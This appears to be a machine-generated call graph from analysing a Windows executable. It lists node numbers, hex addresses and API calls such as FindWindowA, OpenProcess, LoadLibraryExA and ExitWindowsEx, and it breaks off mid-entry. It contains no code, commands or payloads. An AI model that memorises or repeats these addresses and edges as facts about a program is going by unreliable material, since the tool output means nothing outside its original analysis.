54868->54869 54870 11115b8e 54869->54870 54870->54853 54870->54854 54870->54857 54871 11173a35 54894 1116b7b5 54871->54894 54873 11173a52 _LcidFromHexString 54874 11173a5f GetLocaleInfoA 54873->54874 54875 11173a86 54874->54875 54876 11173a92 54874->54876 54879 11161d01 __87except 5 API calls 54875->54879 54899 111646ce 107 API calls 2 library calls 54876->54899 54878 11173a9e 54881 11173aa8 GetLocaleInfoA 54878->54881 54892 11173ad8 _CountryEnumProc@4 _strlen 54878->54892 54880 11173c02 54879->54880 54881->54875 54882 11173ac7 54881->54882 54900 111646ce 107 API calls 2 library calls 54882->54900 54883 11173b4b GetLocaleInfoA 54883->54875 54885 11173b6e 54883->54885 54902 111646ce 107 API calls 2 library calls 54885->54902 54886 11173ad2 54886->54892 54901 11163784 108 API calls 2 library calls 54886->54901 54888 11173b79 54888->54875 54891 11173b81 _strlen 54888->54891 54903 111646ce 107 API calls 2 library calls 54888->54903 54891->54875 54904 111739da GetLocaleInfoW _GetPrimaryLen _strlen 54891->54904 54892->54875 54892->54883 54905 1116b73c GetLastError 54894->54905 54896 1116b7bd 54897 1116b7ca 54896->54897 54917 1116d7aa 67 API calls 3 library calls 54896->54917 54897->54873 54899->54878 54900->54886 54901->54892 54902->54888 54903->54891 54904->54875 54918 1116b5fa TlsGetValue 54905->54918 54908 1116b7a9 SetLastError 54908->54896 54911 1116b76f DecodePointer 54912 1116b784 54911->54912 54913 1116b7a0 _free 54912->54913 54914 1116b788 54912->54914 54913->54908 54927 1116b688 67 API calls 4 library calls 54914->54927 54916 1116b790 GetCurrentThreadId 54916->54908 54919 1116b60f DecodePointer TlsSetValue 54918->54919 54920 1116b62a 54918->54920 54919->54920 54920->54908 54921 11169dbe 54920->54921 54923 11169dc7 54921->54923 54924 11169e04 54923->54924 54925 11169de5 Sleep 54923->54925 54928 11170166 54923->54928 54924->54908 54924->54911 54926 11169dfa 54925->54926 54926->54923 54926->54924 54927->54916 54929 11170172 54928->54929 54930 1117018d 54928->54930 54929->54930 54931 1117017e 54929->54931 54932 111701a0 RtlAllocateHeap 54930->54932 54934 111701c7 54930->54934 54938 1116d4a8 DecodePointer 54930->54938 54937 111692ef 67 API calls __getptd_noexit 54931->54937 54932->54930 54932->54934 54934->54923 54935 11170183 54935->54923 54937->54935 54938->54930 54939 1102e640 54940 1102e683 54939->54940 54941 1110f420 std::locale::facet::_Facet_Register 307 API calls 54940->54941 54942 1102e68a 54941->54942 54949 1102e701 54942->54949 55906 11081bb0 54942->55906 54944 1102e6e6 54945 11081bb0 115 API calls 54944->54945 54945->54949 54946 1102e766 54947 1102e7e5 CreateEventA 54946->54947 54948 1102e7bf GetSystemMetrics 54946->54948 54955 1102e805 54947->54955 54956 1102e819 54947->54956 54948->54947 54950 1102e7ce 54948->54950 54949->54946 54953 111450a0 std::locale::facet::_Facet_Register 121 API calls 54949->54953 54951 11146450 std::locale::facet::_Facet_Register 21 API calls 54950->54951 54954 1102e7d8 54951->54954 54953->54946 55916 1102d330 54954->55916 56055 11029450 307 API calls 2 library calls 54955->56055 54959 1110f420 std::locale::facet::_Facet_Register 307 API calls 54956->54959 54960 1102e820 54959->54960 54961 1102e840 54960->54961 54962 111100d0 451 API calls 54960->54962 54963 1110f420 std::locale::facet::_Facet_Register 307 API calls 54961->54963 54962->54961 54964 1102e854 54963->54964 54965 111100d0 451 API calls 54964->54965 54966 1102e874 54964->54966 54965->54966 54967 1110f420 std::locale::facet::_Facet_Register 307 API calls 54966->54967 54968 1102e8f3 54967->54968 54969 1110f420 std::locale::facet::_Facet_Register 307 API calls 54968->54969 54973 1102e93d 54969->54973 54970 1102e966 FindWindowA 54971 1102eab7 54970->54971 54972 1102e99b 54970->54972 55315 110613d0 54971->55315 54972->54971 54976 1102e9b3 GetWindowThreadProcessId 54972->54976 54973->54970 54978 11146450 std::locale::facet::_Facet_Register 21 API calls 54976->54978 54977 110613d0 309 API calls 54979 1102ead5 54977->54979 54980 1102e9d9 OpenProcess 54978->54980 54981 110613d0 309 API calls 54979->54981 54980->54971 54982 1102e9f9 54980->54982 54983 1102eae1 54981->54983 54989 11146450 std::locale::facet::_Facet_Register 21 API calls 54982->54989 54984 1102eaf8 54983->54984 54985 1102eaef 54983->54985 55322 11145910 54984->55322 56056 11027d60 148 API calls 2 library calls 54985->56056 54987 1102eaf4 54987->54984 54991 1102ea2c 54989->54991 54990 1102eb07 55337 11143230 54990->55337 54992 1102ea6b CloseHandle FindWindowA 54991->54992 54995 11146450 std::locale::facet::_Facet_Register 21 API calls 54991->54995 54993 1102ea93 GetWindowThreadProcessId 54992->54993 54994 1102eaa7 54992->54994 54993->54994 54996 11146450 std::locale::facet::_Facet_Register 21 API calls 54994->54996 54997 1102ea3e SendMessageA WaitForSingleObject 54995->54997 54998 1102eab4 54996->54998 54997->54992 55000 1102ea5e 54997->55000 54998->54971 55001 11146450 std::locale::facet::_Facet_Register 21 API calls 55000->55001 55003 1102ea68 55001->55003 55002 1102eb2a 55004 1102ec01 55002->55004 55348 11062d60 55002->55348 55003->54992 55363 110274c0 55004->55363 55008 110b7920 std::locale::facet::_Facet_Register 9 API calls 55009 1102eb5e 55008->55009 55011 11146450 std::locale::facet::_Facet_Register 21 API calls 55009->55011 55010 1102ec26 55020 1102ec41 55010->55020 55382 1102a620 55010->55382 55013 1102eb70 55011->55013 55016 1102ebb2 55013->55016 56057 11061a40 106 API calls 55013->56057 55016->55004 55030 1102ebc5 55016->55030 55018 1102a620 std::locale::facet::_Facet_Register 174 API calls 55018->55020 55385 110281a0 55020->55385 55021 1102eb87 55021->55016 56058 11061a60 174 API calls std::locale::facet::_Facet_Register 55021->56058 55022 111414a0 842 API calls 55024 1102ec62 55022->55024 55408 1102db00 55024->55408 55027 1102eb92 55027->55016 55030->55004 55032 1102d330 791 API calls 55030->55032 56059 11027d60 148 API calls 2 library calls 55030->56059 56060 110f6080 145 API calls 2 library calls 55030->56060 55032->55016 55316 11061446 55315->55316 55321 110613f7 55315->55321 55317 11161d01 __87except 5 API calls 55316->55317 55319 1102eac9 55317->55319 55319->54977 55320 11081bb0 115 API calls 55320->55321 55321->55316 55321->55320 56113 110612f0 309 API calls 3 library calls 55321->56113 56114 11144bd0 55322->56114 55325 11144bd0 std::locale::facet::_Facet_Register 307 API calls 55326 11145947 wsprintfA 55325->55326 55327 11143230 std::locale::facet::_Facet_Register 8 API calls 55326->55327 55328 11145964 55327->55328 55329 11145990 55328->55329 55330 11143230 std::locale::facet::_Facet_Register 8 API calls 55328->55330 55331 11161d01 __87except 5 API calls 55329->55331 55332 11145979 55330->55332 55333 1114599c 55331->55333 55332->55329 55334 11145980 55332->55334 55333->54990 55335 11161d01 __87except 5 API calls 55334->55335 55336 1114598c 55335->55336 55336->54990 55338 11143251 CreateFileA 55337->55338 55340 111432ee CloseHandle 55338->55340 55341 111432ce 55338->55341 55344 11161d01 __87except 5 API calls 55340->55344 55342 111432d2 CreateFileA 55341->55342 55343 1114330b 55341->55343 55342->55340 55342->55343 55346 11161d01 __87except 5 API calls 55343->55346 55345 11143307 55344->55345 55345->55002 55347 1114331a 55346->55347 55347->55002 55349 1105dd10 106 API calls 55348->55349 55350 11062d88 55349->55350 56160 11061c90 55350->56160 55352 1102eb51 55352->55004 55352->55008 55354 1105de40 5 API calls 55355 11062de9 55354->55355 55356 1105dd10 106 API calls 55355->55356 55357 11062e1d 55356->55357 55359 1105de40 5 API calls 55357->55359 55361 11062e3c 55357->55361 55358 1105dd10 106 API calls 55360 11062e6c 55358->55360 55359->55361 55360->55352 55362 1105de40 5 API calls 55360->55362 55361->55358 55362->55352 55364 110274f4 55363->55364 55365 1105dd10 106 API calls 55364->55365 55366 11027509 55365->55366 55367 1102755f LoadIconA 55366->55367 55371 11145320 std::locale::facet::_Facet_Register 121 API calls 55366->55371 55380 110275d8 55366->55380 55368 11027571 55367->55368 55369 1102757a GetSystemMetrics GetSystemMetrics LoadImageA 55367->55369 55368->55369 55373 110275b3 55369->55373 55374 1102759f LoadIconA 55369->55374 55370 1102768c 55375 11161d01 __87except 5 API calls 55370->55375 55372 11027542 LoadLibraryExA 55371->55372 55372->55367 55372->55374 55377 110275b7 GetSystemMetrics GetSystemMetrics LoadImageA 55373->55377 55373->55380 55374->55373 55378 11027699 55375->55378 55377->55380 55378->55010 55379 11081bb0 115 API calls 55379->55380 55380->55370 55380->55379 55381 111450a0 std::locale::facet::_Facet_Register 121 API calls 55380->55381 56863 110612f0 309 API calls 3 library calls 55380->56863 55381->55380 56864 110285f0 55382->56864 55384 1102a62e 55384->55018 55386 11146450 std::locale::facet::_Facet_Register 21 API calls 55385->55386 55387 110281c6 55386->55387 55388 110282b4 55387->55388 55389 110281dd GetModuleFileNameA 55387->55389 56887 11013830 22 API calls 2 library calls 55388->56887 55391 11081b40 std::locale::facet::_Facet_Register IsDBCSLeadByte 55389->55391 55392 11028201 55391->55392 55394 1102820e wsprintfA 55392->55394 55395 110282cd 55392->55395 55393 110282c7 55393->55395 55397 11028242 55394->55397 55396 11146450 std::locale::facet::_Facet_Register 21 API calls 55395->55396 55398 110282db LoadLibraryExA 55396->55398 55397->55395 55399 1102824a WaitForSingleObject GetExitCodeProcess 55397->55399 55403 11028334 55398->55403 55404 1102831b GetModuleHandleA 55398->55404 55400 11028277 wsprintfA 55399->55400 55401 1102829a CloseHandle CloseHandle 55399->55401 55400->55401 55401->55395 55406 11161d01 __87except 5 API calls 55403->55406 55405 11028331 ___DllMainCRTStartup 55404->55405 55405->55403 55407 11028343 55406->55407 55407->55022 55407->55024 55907 11081bbd 55906->55907 55908 11081bc2 55906->55908 57817 11081990 IsDBCSLeadByte 55907->57817 55910 11081bcb 55908->55910 55915 11081bdf 55908->55915 57818 111646ce 107 API calls 2 library calls 55910->57818 55912 11081bd8 55912->54944 55913 11081c43 55913->54944 55914 11165797 112 API calls std::locale::facet::_Facet_Register 55914->55915 55915->55913 55915->55914 55917 11146450 std::locale::facet::_Facet_Register 21 API calls 55916->55917 55918 1102d36c 55917->55918 55919 11145320 std::locale::facet::_Facet_Register 121 API calls 55918->55919 55920 1102d374 55919->55920 55921 1102d3a9 GetCurrentProcess SetPriorityClass 55920->55921 55922 1102d37d InterlockedIncrement 55920->55922 55925 1102d3dd 55921->55925 55922->55921 55923 1102d38c 55922->55923 55924 11146450 std::locale::facet::_Facet_Register 21 API calls 55923->55924 55926 1102d396 55924->55926 55927 1102d3e6 SetEvent 55925->55927 55930 1102d3ed 55925->55930 55928 1102d3a0 Sleep 55926->55928 55927->55930 55928->55928 55929 1102d424 55934 1102d452 55929->55934 57838 1109f1d0 313 API calls std::locale::facet::_Facet_Register 55929->57838 55930->55929 57836 11029370 313 API calls std::locale::facet::_Facet_Register 55930->57836 55933 1102d40d 57837 110ff6c0 312 API calls std::locale::facet::_Facet_Register 55933->57837 57819 11028090 SetEvent 55934->57819 55937 1102d468 55938 1102d47d 55937->55938 57839 110ec980 327 API calls 55937->57839 55940 1102d49f 55938->55940 57840 110594a0 SetEvent 55938->57840 55942 1102d4de 55940->55942 55944 1102d4b3 Sleep 55940->55944 55943 11146450 std::locale::facet::_Facet_Register 21 API calls 55942->55943 55945 1102d4e8 55943->55945 55944->55942 55946 1102d518 55945->55946 55948 1105dd10 106 API calls 55945->55948 55949 1102d58a 55946->55949 55950 1102d53f 55946->55950 55948->55946 55956 1102d5a9 55949->55956 55962 1102d5cb 55949->55962 57820 110affa0 55950->57820 55954 1102d613 55958 1102d62d 55954->55958 55968 11146450 std::locale::facet::_Facet_Register 21 API calls 55954->55968 55957 1102d5af PostThreadMessageA 55956->55957 55956->55962 57843 1110f3a0 WaitForSingleObject 55957->57843 55964 1102d66b 55958->55964 55965 1102d65c 55958->55965 55959 1102d5f0 57845 11059400 DeleteCriticalSection CloseHandle 55959->57845 55962->55954 55962->55959 57844 1110f3a0 WaitForSingleObject 55962->57844 55963 1102d56a 55970 1102d57d 55963->55970 57842 111352b0 338 API calls 4 library calls 55963->57842 55967 1102d681 55964->55967 55972 11075d10 355 API calls 55964->55972 57846 11105420 26 API calls std::locale::facet::_Facet_Register 55965->57846 55973 11146450 std::locale::facet::_Facet_Register 21 API calls 55967->55973 55968->55958 57865 1100d4e0 FreeLibrary 55970->57865 55972->55967 55977 1102d68b 55973->55977 55976 1102d661 57847 11107b50 556 API calls std::locale::facet::_Facet_Register 55976->57847 55980 1113cc30 342 API calls 55977->55980 55978 1102d889 55981 1102d8a0 55978->55981 57866 1100d200 wsprintfA 55978->57866 55984 1102d690 55980->55984 55989 1102d8c7 GetModuleFileNameA GetFileAttributesA 55981->55989 56003 1102d9fa 55981->56003 55982 1102d666 57848 11105ac0 71 API calls std::locale::facet::_Facet_Register 55982->57848 55987 11146450 std::locale::facet::_Facet_Register 21 API calls 55984->55987 55990 1102d69a 55987->55990 55988 1102d895 55991 11146450 std::locale::facet::_Facet_Register 21 API calls 55988->55991 55992 1102d8ef 55989->55992 55989->56003 55994 1102d6b7 55990->55994 55995 1102d6a9 55990->55995 55991->55981 55997 1110f420 std::locale::facet::_Facet_Register 307 API calls 55992->55997 55993 11146450 std::locale::facet::_Facet_Register 21 API calls 55998 1102da92 55993->55998 55996 11146450 std::locale::facet::_Facet_Register 21 API calls 55994->55996 57849 1109d920 WaitForSingleObject SetEvent WaitForSingleObject CloseHandle 55995->57849 56000 1102d6c1 55996->56000 56025 1102d8f6 55997->56025 57869 11146410 FreeLibrary 55998->57869 56007 1102d6d5 56000->56007 57850 1110e5c0 DeleteCriticalSection 56000->57850 56003->55993 56004 1102da9a 56006 1102dad6 56004->56006 56011 1102dac4 ExitWindowsEx 56004->56011 56012 1102dab4 ExitWindowsEx Sleep 56004->56012 56008 1102dae6 56006->56008 56009 1102dadb Sleep 56006->56009 56010 1102d74f 56007->56010 57851 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 56007->57851 56014 11146450 std::locale::facet::_Facet_Register 21 API calls 56008->56014 56009->56008 56015 1102d75b 56010->56015 56016 1102d769 56010->56016 56011->56006 56012->56011 56020 1102daf0 ExitProcess 56014->56020 57853 1110fc70 320 API calls std::locale::facet::_Facet_Register 56015->57853 56019 1102d7e2 56016->56019 56032 1102d760 56016->56032 56022 11146450 std::locale::facet::_Facet_Register 21 API calls 56019->56022 56023 1102d7ec 56022->56023 56026 1102d7fb 56023->56026 56027 1102d809 CloseHandle 56023->56027 56024 1102d9e3 56024->56003 56025->56024 56028 11081b40 std::locale::facet::_Facet_Register IsDBCSLeadByte 56025->56028 57855 1108a570 56026->57855 56033 1102d824 _free 56027->56033 56034 1102d82d 56027->56034 56031 1102d953 56028->56031 56029 11146450 std::locale::facet::_Facet_Register 21 API calls 56046 1102d6ff 56029->56046 56036 1102d96e _memset 56031->56036 57867 11029450 307 API calls 2 library calls 56031->57867 56032->56016 56032->56019 57854 1110fc70 320 API calls std::locale::facet::_Facet_Register 56032->57854 56033->56034 56053 1102d869 56034->56053 57862 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 56034->57862 56035 1102d800 56035->56027 56039 1102d988 FindFirstFileA 56036->56039 56041 1102d9d4 56039->56041 56042 1102d9a8 FindNextFileA 56039->56042 56040 1102d83c 56044 1102d840 _free 56040->56044 56045 1102d858 56040->56045 57868 111266e0 333 API calls 5 library calls 56041->57868 56054 1102d9c8 FindClose 56042->56054 57863 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 56044->57863 56045->56053 57864 1110fc70 320 API calls std::locale::facet::_Facet_Register 56045->57864 56046->56010 56046->56029 57852 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 56046->57852 56047 1102d7d9 56047->56019 56053->55970 56054->56041 56056->54987 56057->55021 56058->55027 56059->55030 56060->55030 56113->55321 56115 11144bf2 56114->56115 56118 11144c09 std::locale::facet::_Facet_Register 56114->56118 56157 11029450 307 API calls 2 library calls 56115->56157 56121 11144c3c GetModuleFileNameA 56118->56121 56130 11144d97 56118->56130 56119 11161d01 __87except 5 API calls 56120 11144db3 wsprintfA 56119->56120 56120->55325 56138 11081b40 56121->56138 56123 11144c51 56124 11144c61 SHGetFolderPathA 56123->56124 56125 11144d48 56123->56125 56126 11144c8e 56124->56126 56127 11144cad SHGetFolderPathA 56124->56127 56128 11142290 std::locale::facet::_Facet_Register 304 API calls 56125->56128 56126->56127 56131 11144c94 56126->56131 56132 11144ce2 56127->56132 56128->56130 56130->56119 56158 11029450 307 API calls 2 library calls 56131->56158 56135 1102a620 std::locale::facet::_Facet_Register 174 API calls 56132->56135 56136 11144cf3 56135->56136 56142 11144670 56136->56142 56139 11081b53 _strrchr 56138->56139 56141 11081b6a std::locale::facet::_Facet_Register 56139->56141 56159 11081990 IsDBCSLeadByte 56139->56159 56141->56123 56143 111446fa 56142->56143 56144 1114467b 56142->56144 56143->56125 56144->56143 56145 1114468b GetFileAttributesA 56144->56145 56146 111446a5 56145->56146 56147 11144697 56145->56147 56148 11163cf8 __strdup 67 API calls 56146->56148 56147->56125 56149 111446ac 56148->56149 56150 11081b40 std::locale::facet::_Facet_Register IsDBCSLeadByte 56149->56150 56151 111446b6 56150->56151 56152 11144670 std::locale::facet::_Facet_Register 68 API calls 56151->56152 56156 111446d6 56151->56156 56153 111446c6 56152->56153 56154 111446dc _free CreateDirectoryA 56153->56154 56155 111446ce _free 56153->56155 56154->56156 56155->56156 56156->56125 56159->56141 56266 11144ea0 56160->56266 56162 11061d1c 56163 110d1550 307 API calls 56162->56163 56165 11061d30 56163->56165 56164 11061d44 56166 11062c88 56164->56166 56168 11163db7 std::locale::facet::_Facet_Register 132 API calls 56164->56168 56165->56164 56167 11061f17 56165->56167 56274 1116449d 56165->56274 56170 110d07c0 308 API calls 56166->56170 56169 1116449d _fgets 81 API calls 56167->56169 56168->56166 56172 11061f31 56169->56172 56203 11061e11 56170->56203 56178 11061f97 _strpbrk 56172->56178 56179 11061f38 56172->56179 56173 11061dc7 56174 11061dce 56173->56174 56187 11061e1d _strpbrk std::locale::facet::_Facet_Register 56173->56187 56175 11061e03 56174->56175 56309 11163db7 56174->56309 56177 110d07c0 308 API calls 56175->56177 56177->56203 56293 11163676 56178->56293 56180 11061f7d 56179->56180 56184 11163db7 std::locale::facet::_Facet_Register 132 API calls 56179->56184 56181 110d07c0 308 API calls 56180->56181 56181->56203 56183 11161d01 __87except 5 API calls 56185 11062cbf 56183->56185 56184->56180 56185->55352 56185->55354 56185->55355 56186 1116449d _fgets 81 API calls 56220 11061fc1 _strpbrk std::locale::facet::_Facet_Register 56186->56220 56187->56167 56192 11061eb8 56187->56192 56189 110623fa 56193 11061efd 56192->56193 56197 11163db7 std::locale::facet::_Facet_Register 132 API calls 56192->56197 56194 110d07c0 308 API calls 56193->56194 56194->56203 56197->56193 56203->56183 56205 11081a70 IsDBCSLeadByte 56205->56220 56212 11025b80 132 API calls 56212->56203 56214 11142290 std::locale::facet::_Facet_Register 307 API calls 56214->56220 56215 11062205 56321 11025b80 56215->56321 56220->56164 56220->56186 56220->56189 56220->56205 56220->56214 56220->56215 56221 11081bb0 115 API calls 56220->56221 56223 11062368 GetTickCount CheckLicenseString wsprintfA 56220->56223 56228 11145b40 4 API calls 56220->56228 56256 110625cc 56220->56256 56325 11081df0 68 API calls 3 library calls 56220->56325 56221->56220 56227 110623b0 std::locale::facet::_Facet_Register 56223->56227 56227->56220 56228->56220 56256->56212 56271 11144eb3 56266->56271 56268 11144f1a 56268->56162 56269 11144ed5 GetLastError 56270 11144ee0 Sleep 56269->56270 56269->56271 56272 11163fed std::locale::facet::_Facet_Register 166 API calls 56270->56272 56271->56268 56271->56269 56347 11163fed 56271->56347 56273 11144ef2 56272->56273 56273->56268 56273->56271 56276 111644a9 __mtinitlocknum 56274->56276 56275 111644bc 56696 111692ef 67 API calls __getptd_noexit 56275->56696 56276->56275 56278 111644ed 56276->56278 56280 111644f2 __lock_file 56278->56280 56286 111644cc __mtinitlocknum 56278->56286 56279 111644c1 56697 1116df04 11 API calls __filbuf 56279->56697 56282 11164506 56280->56282 56287 11164571 56280->56287 56698 11169287 56282->56698 56284 1116459e 56707 111645cd LeaveCriticalSection LeaveCriticalSection _fseek 56284->56707 56286->56173 56287->56284 56676 11171a25 56287->56676 56289 1116450c 56289->56287 56705 111692ef 67 API calls __getptd_noexit 56289->56705 56291 11164566 56706 1116df04 11 API calls __filbuf 56291->56706 56294 1116368f 56293->56294 56750 11163420 56294->56750 56310 11163dc3 __mtinitlocknum 56309->56310 56311 11163dd5 56310->56311 56312 11163dea 56310->56312 56817 111692ef 67 API calls __getptd_noexit 56311->56817 56313 11163dfd __lock_file 56312->56313 56320 11163de5 __mtinitlocknum 56312->56320 56801 11163d4a 56313->56801 56316 11163dda 56818 1116df04 11 API calls __filbuf 56316->56818 56320->56175 56325->56220 56350 11163f31 56347->56350 56349 11163fff 56349->56271 56351 11163f3d __mtinitlocknum 56350->56351 56352 11163f50 56351->56352 56355 11163f7d 56351->56355 56406 111692ef 67 API calls __getptd_noexit 56352->56406 56354 11163f55 56407 1116df04 11 API calls __filbuf 56354->56407 56369 111716f8 56355->56369 56358 11163f82 56359 11163f96 56358->56359 56360 11163f89 56358->56360 56361 11163fbd 56359->56361 56362 11163f9d 56359->56362 56408 111692ef 67 API calls __getptd_noexit 56360->56408 56384 11171461 56361->56384 56409 111692ef 67 API calls __getptd_noexit 56362->56409 56366 11163f60 __mtinitlocknum @_EH4_CallFilterFunc@8 56366->56349 56370 11171704 __mtinitlocknum 56369->56370 56411 1117373c 56370->56411 56372 11171787 56418 11171822 56372->56418 56373 1117178e 56423 11169d79 56373->56423 56377 11171817 __mtinitlocknum 56377->56358 56378 111717a3 InitializeCriticalSectionAndSpinCount 56379 111717d6 EnterCriticalSection 56378->56379 56380 111717c3 _free 56378->56380 56379->56372 56380->56372 56382 11171712 56382->56372 56382->56373 56421 1117367a 67 API calls 6 library calls 56382->56421 56422 1116b048 LeaveCriticalSection LeaveCriticalSection _doexit 56382->56422 56385 11171483 56384->56385 56406->56354 56407->56366 56408->56366 56409->56366 56412 11173764 EnterCriticalSection 56411->56412 56413 11173751 56411->56413 56412->56382 56429 1117367a 67 API calls 6 library calls 56413->56429 56415 11173757 56415->56412 56430 1116d7aa 67 API calls 3 library calls 56415->56430 56431 11173663 LeaveCriticalSection 56418->56431 56420 11171829 56420->56377 56421->56382 56422->56382 56425 11169d82 56423->56425 56424 11162b51 _malloc 66 API calls 56424->56425 56425->56424 56426 11169db8 56425->56426 56427 11169d99 Sleep 56425->56427 56426->56372 56426->56378 56428 11169dae 56427->56428 56428->56425 56428->56426 56429->56415 56431->56420 56677 11171a32 56676->56677 56681 11171a47 56676->56681 56737 111692ef 67 API calls __getptd_noexit 56677->56737 56679 11171a37 56738 1116df04 11 API calls __filbuf 56679->56738 56682 11171a7c 56681->56682 56689 11171a42 56681->56689 56708 1117712e 56681->56708 56684 11169287 __filbuf 67 API calls 56682->56684 56685 11171a90 56684->56685 56711 111747ed 56685->56711 56689->56287 56696->56279 56697->56286 56699 11169293 56698->56699 56700 111692a8 56698->56700 56748 111692ef 67 API calls __getptd_noexit 56699->56748 56700->56289 56702 11169298 56749 1116df04 11 API calls __filbuf 56702->56749 56704 111692a3 56704->56289 56705->56291 56706->56287 56707->56286 56709 11169d79 __malloc_crt 67 API calls 56708->56709 56710 11177143 56709->56710 56710->56682 56712 111747f9 __mtinitlocknum 56711->56712 56713 11174801 56712->56713 56714 1117481c 56712->56714 56739 11169302 67 API calls __getptd_noexit 56713->56739 56716 11174828 56714->56716 56720 11174862 56714->56720 56741 11169302 67 API calls __getptd_noexit 56716->56741 56718 11174806 56723 11174884 ___lock_fhandle 56720->56723 56724 1117486f 56720->56724 56737->56679 56738->56689 56739->56718 56748->56702 56749->56704 56762 11163399 56750->56762 56752 11163444 56770 111692ef 67 API calls __getptd_noexit 56752->56770 56755 11163449 56771 1116df04 11 API calls __filbuf 56755->56771 56756 11163491 __isctype_l 56758 1116347a 56756->56758 56758->56756 56759 111634c1 56758->56759 56761 11163454 56759->56761 56772 111692ef 67 API calls __getptd_noexit 56759->56772 56761->56220 56763 111633ac 56762->56763 56769 111633f9 56762->56769 56764 1116b7b5 __getptd 67 API calls 56763->56764 56765 111633b1 56764->56765 56766 111633d9 56765->56766 56773 111704a8 56765->56773 56766->56769 56788 11170744 70 API calls 5 library calls 56766->56788 56769->56752 56769->56758 56770->56755 56771->56761 56772->56761 56774 111704b4 __mtinitlocknum 56773->56774 56775 1116b7b5 __getptd 67 API calls 56774->56775 56776 111704b9 56775->56776 56788->56769 56802 11163d6f 56801->56802 56803 11163d5b 56801->56803 56804 11163d6b 56802->56804 56820 1116b077 56802->56820 56851 111692ef 67 API calls __getptd_noexit 56803->56851 56819 11163e23 LeaveCriticalSection LeaveCriticalSection _fseek 56804->56819 56807 11163d60 56852 1116df04 11 API calls __filbuf 56807->56852 56817->56316 56818->56320 56819->56320 56821 1116b090 56820->56821 56825 11163d7b 56820->56825 56822 11169287 __filbuf 67 API calls 56821->56822 56821->56825 56826 111710c8 56825->56826 56851->56807 56852->56804 56863->55380 56865 11028613 56864->56865 56870 11028c5b 56864->56870 56866 110286d0 GetModuleFileNameA 56865->56866 56876 11028648 56865->56876 56869 110286f1 _strrchr 56866->56869 56867 11028cf7 56871 11161d01 __87except 5 API calls 56867->56871 56868 11028d0a 56872 11161d01 __87except 5 API calls 56868->56872 56875 11163fed std::locale::facet::_Facet_Register 166 API calls 56869->56875 56870->56867 56870->56868 56873 11028d06 56871->56873 56874 11028d1b 56872->56874 56873->55384 56874->55384 56878 110286cb 56875->56878 56877 11163fed std::locale::facet::_Facet_Register 166 API calls 56876->56877 56877->56878 56878->56870 56882 11028bc5 56878->56882 56885 11026700 67 API calls 3 library calls 56878->56885 56879 11163db7 std::locale::facet::_Facet_Register 132 API calls 56879->56870 56882->56879 56882->56882 56883 11028780 __mbschr_l std::locale::facet::_Facet_Register 56883->56882 56884 111646ce 107 API calls _CountryEnumProc@4 56883->56884 56886 11026700 67 API calls 3 library calls 56883->56886 56884->56883 56885->56883 56886->56883 56887->55393 57817->55908 57818->55912 57819->55937 57870 110805f0 57820->57870 57825 1102d54a 57829 110eb080 57825->57829 57826 110affe7 57882 11029450 307 API calls 2 library calls 57826->57882 57830 110affa0 309 API calls 57829->57830 57831 110eb0ad 57830->57831 57898 110ea450 57831->57898 57833 110eb0f1 57908 110b0190 310 API calls std::locale::facet::_Facet_Register 57833->57908 57835 1102d555 57841 110b0190 310 API calls std::locale::facet::_Facet_Register 57835->57841 57836->55933 57837->55929 57838->55934 57839->55938 57840->55940 57841->55963 57842->55970 57843->55956 57844->55962 57846->55976 57847->55982 57848->55964 57850->56007 57851->56046 57852->56046 57853->56032 57854->56047 57856 1108a617 57855->57856 57860 1108a5aa 57855->57860 57857 1108a61e DeleteCriticalSection 57856->57857 57911 1106e1b0 57857->57911 57858 1108a5be CloseHandle 57858->57860 57860->57856 57860->57858 57861 1108a644 57861->56035 57862->56040 57863->56040 57864->56053 57865->55978 57866->55988 57868->56024 57869->56004 57871 11080614 57870->57871 57872 11080618 57871->57872 57873 1108062f 57871->57873 57883 11029450 307 API calls 2 library calls 57872->57883 57874 11080648 57873->57874 57875 1108062c 57873->57875 57879 110aff90 57874->57879 57875->57873 57884 11029450 307 API calls 2 library calls 57875->57884 57885 110812d0 57879->57885 57886 110812f1 57885->57886 57888 1108131d 57885->57888 57887 1108130b 57886->57887 57886->57888 57891 11161d01 __87except 5 API calls 57887->57891 57889 1108136a wsprintfA 57888->57889 57890 11081345 wsprintfA 57888->57890 57897 11029450 307 API calls 2 library calls 57889->57897 57890->57888 57893 11081319 57891->57893 57893->57825 57893->57826 57900 110ea45b 57898->57900 57899 110ea4f5 57899->57833 57900->57899 57901 110ea47e 57900->57901 57902 110ea495 57900->57902 57909 11029450 307 API calls 2 library calls 57901->57909 57904 110ea492 57902->57904 57905 110ea4c2 SendMessageTimeoutA 57902->57905 57904->57902 57910 11029450 307 API calls 2 library calls 57904->57910 57905->57899 57908->57835 57914 1106e1c4 57911->57914 57912 1106e1c8 57912->57861 57914->57912 57915 1106d9a0 69 API calls std::_Xinvalid_argument 57914->57915 57915->57914 57917 11134d10 57918 11134d48 57917->57918 57919 11134d19 57917->57919 57920 11145320 std::locale::facet::_Facet_Register 121 API calls 57919->57920 57921 11134d1e 57920->57921 57921->57918 57922 11132bf0 315 API calls 57921->57922 57923 11134d27 57922->57923 57923->57918 57924 1105dd10 106 API calls 57923->57924 57924->57918 57925 110310c0 57926 110310ce 57925->57926 57927 11145e80 307 API calls 57926->57927 57928 110310df SetUnhandledExceptionFilter 57927->57928 57929 110310ef std::locale::facet::_Facet_Register 57928->57929 57930 11089a40 57931 1110f6c0 ___DllMainCRTStartup 4 API calls 57930->57931 57932 11089a53 57931->57932 57933 11089a5d 57932->57933 57942 11089150 310 API calls std::locale::facet::_Facet_Register 57932->57942 57935 11089a84 57933->57935 57943 11089150 310 API calls std::locale::facet::_Facet_Register 57933->57943 57938 11089a93 57935->57938 57939 11089a10 57935->57939 57944 110896a0 57939->57944 57942->57933 57943->57935 57981 11088970 6 API calls ___DllMainCRTStartup 57944->57981 57946 110896d9 GetParent 57947 110896ec 57946->57947 57948 110896fd 57946->57948 57949 110896f0 GetParent 57947->57949 57950 11163fed std::locale::facet::_Facet_Register 166 API calls 57948->57950 57949->57948 57949->57949 57951 11089716 57950->57951 57982 11013830 22 API calls 2 library calls 57951->57982 57953 1108974a 57953->57953 57954 11143230 std::locale::facet::_Facet_Register 8 API calls 57953->57954 57956 1108978a 57954->57956 57955 110897a5 57957 11163db7 std::locale::facet::_Facet_Register 132 API calls 57955->57957 57959 